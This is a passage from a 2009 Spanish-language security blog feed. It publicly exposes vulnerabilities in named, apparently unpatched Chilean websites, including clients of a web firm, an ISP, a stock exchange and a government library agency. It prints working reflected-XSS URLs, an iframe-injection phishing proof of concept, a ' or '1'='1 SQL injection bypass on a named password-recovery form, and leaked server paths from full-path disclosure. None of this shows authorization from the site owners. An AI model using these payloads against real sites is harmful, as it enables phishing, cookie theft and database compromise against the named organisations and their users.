		<description><![CDATA[En los artículos que he escrito relacionado a vulnerabilidades webs más comunes siempre aparece el legendario Cross-Site Scripting o XSS. Una vulnerabilidad tan fácil de corregir y a la véz tan común, puede ser muy peligrosa ya que nos permite cruzar la información a través del sitio para luego poder manipularla, por ejemplo el robo [...]]]></description>
			<content:encoded><![CDATA[<p>En los artículos que he escrito relacionado a vulnerabilidades webs más comunes siempre aparece el legendario Cross-Site Scripting o <strong>XSS</strong>. Una vulnerabilidad tan fácil de corregir y a la véz tan común, puede ser muy peligrosa ya que nos permite <em>cruzar la información</em> a través del sitio para luego poder manipularla, por ejemplo el <strong>robo de credenciales</strong> de un sitio web con un login o inicio de sesion.</p>
<p><a href="http://itfreekzone.blogspot.com/" target="_blank"><strong>d3m4s1@d0v1v0</strong></a> escribió un artículo titulado &#8220;<a href="http://itfreekzone.blogspot.com/2009/12/cruzando-informacion-cross-site.html" target="_blank">Cruzando Información, Cross-Site Scripting (XSS)</a>&#8221; en el que, luego de aclarar el fín del artículo</p>
<blockquote><p><span style="font-weight: bold;">ACLARACION:</span> el artículo está dirigido a aquellos que quieran aprender programación web segura, gente dedicada a la seguridad que utiliza el hacking ético para descubrir problemas a solucionar y reportarlos. Para hacer este tipo de ataque deben contar con la aprobación del encargado de la web o quién corresponda.</p></blockquote>
<p>explica detalladamente el por qué del nombre XSS, que es el XSS, cómo se puede &#8220;usar&#8221; el XSS, lograr que el usuario ejecute lo que queremos, entre otras cosas.<br />
Recomiendo el artículo a quienes quieran informarse un poco más sobre el tema.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fcruzando-la-informacion-en-un-sitio-web-vulnerable%2F&amp;linkname=Cruzando%20la%20informaci%C3%B3n%20en%20un%20sitio%20web%20vulnerable">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/cruzando-la-informacion-en-un-sitio-web-vulnerable/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Empresas de hosting y diseño web al descubierto: GoldenData</title>
		<link>http://blog.zerial.org/seguridad/empresas-de-hosting-y-diseno-web-al-descubierto-goldendata/</link>
		<comments>http://blog.zerial.org/seguridad/empresas-de-hosting-y-diseno-web-al-descubierto-goldendata/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 01:13:49 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[Empresas de hosting y diseño web al descubierto]]></category>
		<category><![CDATA[full path disclosure]]></category>
		<category><![CDATA[goldendata]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqli]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=914</guid>
		<description><![CDATA[Esta es mi tercer objetivo, la empresa Golden Data. Hace un tiempo escribí cosas relacionadas a esta empresa donde mostraba una serie de vulnerabilidades del tipo XSS y Full Path/File disclosure, entre otras. En ese momento, me comuniqué con los encargados e intercambiamos 4 o 5 correos. Les comuniqué que tanto su sitio como sitios [...]]]></description>
			<content:encoded><![CDATA[<p>Esta es mi tercer objetivo, la empresa <a href="http://goldendata.cl" target="_blank">Golden Data</a>. Hace un tiempo escribí <a href="http://blog.zerial.org/seguridad/goldendata-una-empresa-en-la-que-no-se-puede-confiar/" target="_blank">cosas relacionadas</a> a esta empresa donde mostraba una serie de vulnerabilidades del tipo XSS y Full Path/File disclosure, entre otras.</p>
<p style="text-align: center;"><img class="size-full wp-image-928 aligncenter" title="goldendata_exposed" src="http://blog.zerial.org/wp-content/uploads/2009/09/goldendata_exposed.png" alt="goldendata_exposed" width="228" height="132" /></p>
<p>En ese momento, me comuniqué con los encargados e intercambiamos 4 o 5 correos. Les comuniqué que tanto su sitio como sitios de clientes tenian graves vulnerabilidades, les dije exactamente que tipo de vulnerabilidades tenian y la forma de corregirlas. Luego de esto, la gente de GoldenData me preguntó si le podía hacer auditoría a otros sitios que tienen ellos &#8230; y yo, nada de tonto, le dije que si, pero como era un servicio que ellos me estaban pidiendo les cobraría mis horas hombre, luego de este último correo&#8230; la gente no se contactó nunca más conmigo&#8230; pues claro, querían que les hiciera auditoria gratis. Ahora me entero que la gente cambió totalmente el sitio web de su empresa pero no ha corregido los sitios de sus clientes. Esta véz no me centraré en GoldenData.cl, hablaré sobre los desarrollos que hacen ellos, es decir, sus clientes:</p>
<ul>
<li><a href="http://www.artpetit.cl/" target="_blank">http://www.artpetit.cl/</a><a></a></li>
<li><a href="http://www.videocity.cl/" target="_blank">http://www.videocity.cl/</a><a></a></li>
<li><a href="http://www.arapemaquetas.cl/" target="_blank">http://www.arapemaquetas.cl/</a><a></a></li>
<li><a href="http://www.questor.cl/" target="_blank">http://www.questor.cl/</a><a></a></li>
<li><a href="http://www.almendradec.cl/" target="_blank">http://www.almendradec.cl/</a><a></a></li>
<li><a href="http://www.kelsopro.cl/" target="_blank">http://www.kelsopro.cl/</a><a></a></li>
<li><a href="http://www.zanartu.cl/" target="_blank">http://www.zanartu.cl/</a><a></a></li>
<li><a href="http://www.riosycia.cl/" target="_blank">http://www.riosycia.cl/</a><a></a></li>
<li><a href="http://www.beeone.cl/" target="_blank">http://www.beeone.cl/</a><a></a></li>
</ul>
<p>Tampoco me desgastaré en algo que ya hice: Comunicarme con la empresa, ya que además de ser aprovechadores, no supieron dar la cara.</p>
<p><span id="more-914"></span></p>
<p>Antes de empezar hice un análisis rápido a todos los sitios para descartar los que no tengan vulnerabilidades a simple vista. Los sitios descartados son: beeone.cl, almendradec.cl, kelsopro.cl, zanartu.cl y questor.cl. Empezaré a analizar las restantes:</p>
<p>1- <strong><a href="http://www.artpetit.cl/" target="_blank">http://www.artpetit.cl/</a></strong><br />
Las URL sospechosas para realizar LFI, RFI y XSS son las siguientes:</p>
<ol>
<li>http://artpetit.cl/productos.php?categoria=Miniaturas</li>
<li>http://artpetit.cl/?pag=contactenos</li>
<li>http://artpetit.cl/?pag=contactenos&amp;codigo=009F2&amp;nombre=Oso%20en%20Balanc%EDn</li>
</ol>
<p>Si intentamos agregar un código como por ejemplo <em>&lt;script&gt;alert(object)&lt;/script&gt;</em> o cambiar el valor de la variable <em>pag</em> por algun path interno o externo (rfi, lfi) nos mostrara un mensaje que nos dirá: <strong>Not Acceptable.</strong></p>
<p>Por lo que, si bien parecen ser vulnerables, no lo son. Por otro lado, si transformamos la variable <em>pag</em> o <em>categoria</em> a un arreglo (<em>pag[]</em>) veremos que el nos imprime el valor del Array, lo que nos dice automáticamente que <strong>no está parseando los valores de entrada</strong>, el mensaje &#8220;Not Acceptable&#8221; es a nivel de servidor y no de aplicación. Este error no ses crítico y no compromete en absoluto la seguridad del sistema.</p>
<p><a href="http://artpetit.cl/productos.php?categoria[]=asdf" target="_blank">http://artpetit.cl/productos.php?categoria[]=asdf</a></p>
<p>2- <strong><a href="http://www.videocity.cl/" target="_blank">http://www.videocity.cl/</a></strong><br />
Si navegamos por el menú podremos ver una url como <em>http://www.videocity.cl/#vitrina.php?dpto=Audio</em>, lo primero que se nos ocurrirá es cambiar el valor de la variable <em>dpto</em> pero veremos que no tiene ningún resultado, la página se sigue viendo exáctamente igual. El truco es el siguiente: Remover el símbolo &#8220;#&#8221; y dejar la URL de la siguiente forma:</p>
<p><a href="http://www.videocity.cl/vitrina.php?dpto=Audio" target="_blank">http://www.videocity.cl/vitrina.php?dpto=&lt;script&gt;alert(this)&lt;/script&gt;</a> y veremos que nos va a mostrar el alert. Con esto demostramos que este sitio es vulnerable a XSS, pudiendo insertar un iframe para realizar phishing o usar el sitio para cualquier cosa que nos imaginemos.<br />
Podemos intentar el mismo <em>truco</em> para otras url donde se almacenen los id o secciones. Este sitio tiene el mismo error que el anterior al transformar alguna variable a Array.</p>
<p>3- <strong><a href="http://www.arapemaquetas.cl/" target="_blank">http://www.arapemaquetas.cl/</a></strong><br />
Si intentamos hacer XSS a las URL del menú nos encontraremos con el mismo error que en el primer caso: Not acceptable. Sin embargo, la técnica de transformar la variable en un array nos permitirá saber el path del sitio dentro del sistema. A esto se le llama <strong>Full Path Disclosure</strong>.<br />
La URL es:</p>
<p><a href="http://www.arapemaquetas.cl/maquetas.php?categoria[]=Arquitectura" target="_blank">http://www.arapemaquetas.cl/maquetas.php?categoria[]=Arquitectura</a></p>
<p>Obtendremos un resultado como:</p>
<blockquote><p><strong>Warning</strong>:  include(htmls/array.html) [<a href="http://www.arapemaquetas.cl/function.include">function.include</a>]: failed to open stream: No such file or directory in <strong>/home/arapemaq/public_html/maquetas.php</strong> on line <strong>18</strong></p>
<p><strong>Warning</strong>:  include(htmls/array.html) [<a href="http://www.arapemaquetas.cl/function.include">function.include</a>]: failed to open stream: No such file or directory in <strong>/home/arapemaq/public_html/maquetas.php</strong> on line <strong>18</strong></p>
<p><strong>Warning</strong>:  include() [<a href="http://www.arapemaquetas.cl/function.include">function.include</a>]: Failed opening &#8216;htmls/array.html&#8217; for inclusion (include_path=&#8217;.:/usr/lib/php:/usr/local/lib/php&#8217;) in <strong>/home/arapemaq/public_html/maquetas.php</strong> on line <strong>18</strong></p></blockquote>
<p>4- <strong><a href="http://www.riosycia.cl/" target="_blank">http://www.riosycia.cl/</a></strong><br />
Este sitio es vulnerable a XSS mediante la siguiente URL:</p>
<p><a href="http://www.riosycia.cl/productos_categorias.php?categoria=%3Cscript%3Ealert%28this%29%3C/script%3E" target="_blank">http://www.riosycia.cl/productos_categorias.php?categoria=%3Cscript%3Ealert%28this%29%3C/script%3E</a></p>
<p>Si recorremos los distintos links del sitio podremos encontrar la ruta a un fichero llamado clave.php:</p>
<p><a href="http://www.riosycia.cl/aplicaciones/clave.php" target="_blank">http://www.riosycia.cl/aplicaciones/clave.php</a></p>
<p>Si ingresamos un correo cualquiera nos dirá que no está en la base de datos, sin embargo, si ingresamos el comodín</p>
<p>&#8216; or &#8217;1&#8242;=&#8217;1</p>
<p>Nos dirá que el correo fue enviado a esa dirección. Lo que nos <strong>comprueba</strong> que ese formulario es vulnerable a <strong>SQL Injnection</strong>.</p>
<p><strong>Vulnerabilidades detectadas:</strong> Full Path Disclosure, SQL Injection, XSS.<br />
<strong>Alcance de las vulnerabilidades:</strong> Uso del sitio para hacer phishing y, mediante SQLi tener una infinidad de opciones para realizar ataques, incluyendo un D-o-S.<br />
<strong>Errores detectados:</strong> Parametros de entrada sin filtros.</p>
<p>Como conclusión podemos decir que estas personas no  dedican tiempo al tema de la seguridad ya que los sitios que no eran vulnerables es porque son sitios estáticos <span style="text-decoration: line-through;">y feos</span> y aquellos que al intentar <em>violarlos</em> aparecia el menasje de &#8220;Not Acceptable&#8221; es porque el servidor donde esa empresa tenia alojada el sitio web estaba protegido. Esto último explica el hecho de que los sitios hechos de la misma forma funcionen en un servidor y en otros no.</p>
<p>Por lo tanto, <strong>NO</strong> recomiendo esta empresa.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fempresas-de-hosting-y-diseno-web-al-descubierto-goldendata%2F&amp;linkname=Empresas%20de%20hosting%20y%20dise%C3%B1o%20web%20al%20descubierto%3A%20GoldenData">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/empresas-de-hosting-y-diseno-web-al-descubierto-goldendata/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Sitios vulnerables de la semana</title>
		<link>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-3/</link>
		<comments>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-3/#comments</comments>
		<pubDate>Sun, 02 Aug 2009 17:24:35 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[bolsa de santiago]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[vtr]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=694</guid>
		<description><![CDATA[Ya llevo un mes publicando sitios vulnerables todas las semanas, he publicado mas de 20 sitios con distintas vulnerabilidades, esta semana será la última ya que me he involucrado, junto a otras personas, en un proyecto un poco más ambicioso en el que haré una publicación más masiva involucrando muchos más sitios de mayor importancia. [...]]]></description>
			<content:encoded><![CDATA[<p>Ya llevo un mes publicando sitios vulnerables todas las semanas, he <a href="http://blog.zerial.org/category/seguridad/sitios-vulnerables-seguridad/" target="_blank">publicado mas de 20 sitios</a> con distintas vulnerabilidades, esta semana será la última ya que me he involucrado, junto a otras personas, en un proyecto un poco más ambicioso en el que haré una publicación más masiva involucrando muchos más sitios de mayor importancia.</p>
<p>Esta semana mostraré sólo dos sitios, el que corresponde al <a href="http://vtr.net" target="_blank">ISP Chileno VTR</a> y al sitio web de la <a href="http://bolsadesantiago.cl" target="_blank">Bolsa de Santiago</a>.<br />
Ambos sitios tienen una vulnerabilidad del tipo <strong>XSS</strong> que nos permite usar la identidad del sitio para distintos fines.</p>
<p>Sin más, los sitios y URI vulnrables son:</p>
<p><a href="https://wsc.vtr.net/proveedores/main.asp?mensaje=" target="_blank">https://wsc.vtr.net/proveedores/main.asp?mensaje=</a><strong>[XSS]</strong><br />
<a href="http://ppwww.bolsadesantiago.com/error.asp?mensaje=" target="_blank">http://ppwww.bolsadesantiago.com/error.asp?mensaje=</a><strong>[XSS]</strong></p>
<p><span id="more-694"></span></p>
<p>Quiero agradecer a <a href="http://panic.insecurity.cl" target="_blank">Panic</a> por la información entregada.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fsitios-vulnerables-de-la-semana-3%2F&amp;linkname=Sitios%20vulnerables%20de%20la%20semana">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/sitios-vulnerables-de-la-semana-3/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>El phishing y la poca preocupación para combatirlo</title>
		<link>http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/</link>
		<comments>http://blog.zerial.org/seguridad/el-phishing-y-la-poca-preocupacion-para-combatirlo/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 02:50:13 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=695</guid>
		<description><![CDATA[El phishing es una de las técnicas de robo de identidad e información más fácil de explotar, no porque el hacerlo sea sencillo, sino por las empresas y la gente que no se preocupa de proteger su información. Si bien esta técnica muchas veces requiere de ingenieria social (más aún cuando es un ataque dirigido), [...]]]></description>
			<content:encoded><![CDATA[<p>El <em>phishing</em> es una de las técnicas de robo de identidad e información más fácil de explotar, no porque el hacerlo sea sencillo, sino por las empresas y la gente que no se preocupa de proteger su información. Si bien esta técnica muchas veces requiere de ingenieria social (más aún cuando es un ataque dirigido), conocimientos <em>basicos</em> de programación y/o diseño o desarrollo web, es explotado muchas veces por personas no muy expertas y no necesariamente &#8220;hackers&#8221;.<br />
El <em>phishing</em> se puede lograr de varias formas, entre las más conocidas están la duplicación de sitios web y mediante la <a href="http://blog.zerial.org/?s=xss" target="_blank">vulnerabilidad <strong>XSS</strong></a>. Esta última facilita a la anterior.</p>
<p>Básicamente, <strong>¿Qué es el phishing?</strong></p>
<p>Definamos phishing como una tecnica de &#8220;pesca&#8221; para robar información privada/personal de personas y/o empresas.</p>
<p><strong>¿Cómo se lleva acabo esta técnica?</strong></p>
<p>Puede resultar tan sencillo como intentar engañar a un niño, pues hacemos creer a una persona algo que no lo es con la finalidad de que esta persona nos entregue datos confidenciales y/o privados, por ejemplo, mediante un formulario de login a un sistema (universidad, banco, etc) falsificado.</p>
<p><span id="more-695"></span></p>
<p>A las empresas parece importarle poco el tema de seguridad en este aspecto, segun mi experiencia y estudios realizados por mi (ver en este blog), la vulnerabilidad XSS es una de las más comunes y es la que nos permite robar informacion de muchas formas usando la identidad de la empresa/sitio web vulnerable.</p>
<p>Tomemos como ejemplo una de las páginas que he publicado con este vulnerabilidad, que aun no lo solucionan. Corresponde al sitio web de la <a href="http://www.dibam.cl" target="_blank">&#8220;Direccion de bibliotecas, archivos y museos&#8221; DIBAM</a>, la URI vulnerable es:<br />
<a href="http://www.dibam.cl/error.asp?cadena=a&amp;pagina=" target="_blank">http://www.dibam.cl/error.asp?cadena=a&amp;pagina=<strong>[XSS]</strong></a></p>
<p>Podemos insertar cualquier código javascript o html, como prueba de concepto vamos a insertar un iframe apuntando a google:</p>
<p><a href="http://www.dibam.cl/error.asp?cadena=a&amp;pagina=%3Ciframe%20src=http://google.cl%20frameborder=0%20width=660%3E%3C/iframe%3E" target="_blank">http://www.dibam.cl/error.asp?cadena=a&amp;pagina=%3Ciframe%20src=http://google.cl%20frameborder=0%20width=660%3E%3C/iframe%3E</a></p>
<p><img class="aligncenter size-full wp-image-698" title="dibam-1" src="http://blog.zerial.org/wp-content/uploads/2009/07/dibam-1.png" alt="dibam-1" width="462" height="302" /></p>
<p>De este mismo modo, pudimos haber hecho referencia a un sitio con un login modificado, haciendonos pasar por &#8220;dibam&#8221; y pidiendo informacion privada a usuarios. De esta misma forma, podemos hacer referencia desde el siti o&#8221;dibam.cl&#8221; a algun fichero infectado con algun troyano, virus, etc.</p>
<p>Respecto al javascript, todo codigo javascript ejecutado si bien se ejecuta en por el lado del cliente, lo que no significa ningun riesgo para el servidor, hay que dejar en claro que todo el código javascritp será ejecutado en el contexto del sitio web, por lo que será posible el acceso a cookies, etc lo que nos permitirá robar las cookies para logearnos en algún sistema.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-la-poca-preocupacion-para-combatirlo%2F&amp;linkname=El%20phishing%20y%20la%20poca%20preocupaci%C3%B3n%20para%20combatirlo" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a 